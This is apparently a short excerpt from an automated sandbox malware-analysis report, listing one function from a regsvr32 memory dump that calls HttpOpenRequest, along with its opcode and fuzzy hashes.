                                                                                                                      • Source File: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpOpenRequest
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1984915467-0
                                                                                                                      • Opcode ID: ef3392a53f393c253ca7a8ed96990fe4d31faf9a6bddb93e23eb60e210117687
                                                                                                                      • Instruction ID: 035c47ef70bc0c2c70a3e7b3a92b0a383b56db56109828277292dcff0bcd7dd0
                                                                                                                      • Opcode Fuzzy Hash: ef3392a53f393c253ca7a8ed96990fe4d31faf9a6bddb93e23eb60e210117687
                                                                                                                      • Instruction Fuzzy Hash: 8B41E47051CB848FDBB4DF58D485B9AB7E0FB98304F104A5EE88CD7255CB749984CB86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%